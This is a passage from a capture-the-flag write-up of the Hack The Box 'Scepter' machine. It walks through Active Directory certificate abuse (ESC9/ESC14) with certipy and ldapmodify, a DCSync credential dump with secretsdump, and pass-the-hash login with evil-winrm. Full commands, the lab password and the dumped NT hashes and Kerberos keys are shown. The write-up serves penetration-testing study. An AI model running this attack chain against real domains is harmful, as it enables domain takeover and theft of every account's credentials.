Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The resolution lifetime expired after 5.401 seconds: Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 2
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'

But when I try to get the hash, it says Name mismatch between certificate and user 'administrator', which was strange

─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username Administrator -dc-ip '10.10.11.65'                                                                                                        
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'administrator@scepter.htb'
[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'administrator'
[-] See the wiki for more information

Let’s try with a different user’s email

h.brown
p.adams
e.lewis
o.scott
M.clark

Let’s start with h.brown

└─$ cat h_brown_mail.ldif                                                                                                                   
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: h.brown@scepter.htb

└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f h_brown_mail.ldif      
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"

                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The resolution lifetime expired after 5.407 seconds: Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
File 'd.baker.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'd.baker.pfx'

Now we can try to get the hash

└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown -dc-ip '10.10.11.65'    
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'h.brown@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'h.brown.ccache'
[*] Wrote credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c

Now we can get the shell

└─$ netexec smb 10.10.11.65 -u a.carter -p 'P@ssw0rd@123' --generate-krb5-file ./krb5.conf
SMB         10.10.11.65     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.65     445    DC01             [+] scepter.htb\a.carter:P@ssw0rd@123 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ export KRB5_CONFIG=./krb5.conf
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ export KRB5CCNAME=h.brown.ccache                                                      
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ evil-winrm -i dc01.scepter.htb -k -f h.brown.ccache -r scepter.htb 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: Useless cert/s provided, SSL is not enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> 

found user.txt

    Directory: C:\Users\h.brown\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/24/2025   2:22 PM             34 user.txt

Privilege Escalation

ESC9 with modification (ESC14)

On looking at ldapdomaindump, we could abuse ESC9 for the account h.brown because it was the only account with an LDAP attribute altSecurityIdentities set to X509:<RFC822>h.brown@scepter.htb

h.brown is a member of the group CMS.

Let’s check ACE for CMS group

*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADObject -Filter * -Properties nTSecurityDescriptor | ForEach-Object { $dn=$_.DistinguishedName; $_.nTSecurityDescriptor.Access | Where-Object { $_.IdentityReference -like "*CMS*" } | ForEach-Object { "$($_.IdentityReference) has $($_.ActiveDirectoryRights) on $($_.ObjectType) - Target: $dn" } }
SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has ReadProperty on 00000000-0000-0000-0000-000000000000 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has GenericExecute on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has ReadProperty on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb

The line SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb tells us that SCEPTER\CMS has write access to altSecurityIdentities on p.adams

So if we can change/add altSecurityIdentities for p.adams we can get the hash and we know that p.adams has DCsync Rights

*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity "p.adams" -Properties altSecurityIdentities | Select-Object Name,altSecurityIdentities

Name    altSecurityIdentities
----    ---------------------
p.adams {}

*Evil-WinRM* PS C:\Users\h.brown\Documents> Set-ADUser -Identity "p.adams" -Add @{altSecurityIdentities='X509:<RFC822>p.adams@scepter.htb'}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity "p.adams" -Properties altSecurityIdentities | Select-Object Name,altSecurityIdentities

Name    altSecurityIdentities
----    ---------------------
p.adams {X509:<RFC822>p.adams@scepter.htb}

*Evil-WinRM* PS C:\Users\h.brown\Documents> 

Now for ESC9 we need to update the email for d.baker

└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f p_adams_mail.ldif
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"

                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ cat p_adams_mail.ldif  
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: p.adams@scepter.htb

Now let’s try to get the hash

└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate                                                              
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 9
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'

└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username p.adams -dc-ip '10.10.11.65' 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'p.adams.ccache'
[*] Wrote credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0

DCSync

└─$ impacket-secretsdump scepter.htb/p.adams@10.10.11.65 -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a741fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up... 

and we are in

└─$ evil-winrm -i 10.10.11.65 -u administrator -H a291ead3493f9773dc615e66c2ea21c4
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

found root.txt

   Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/24/2025   2:22 PM             34 root.txt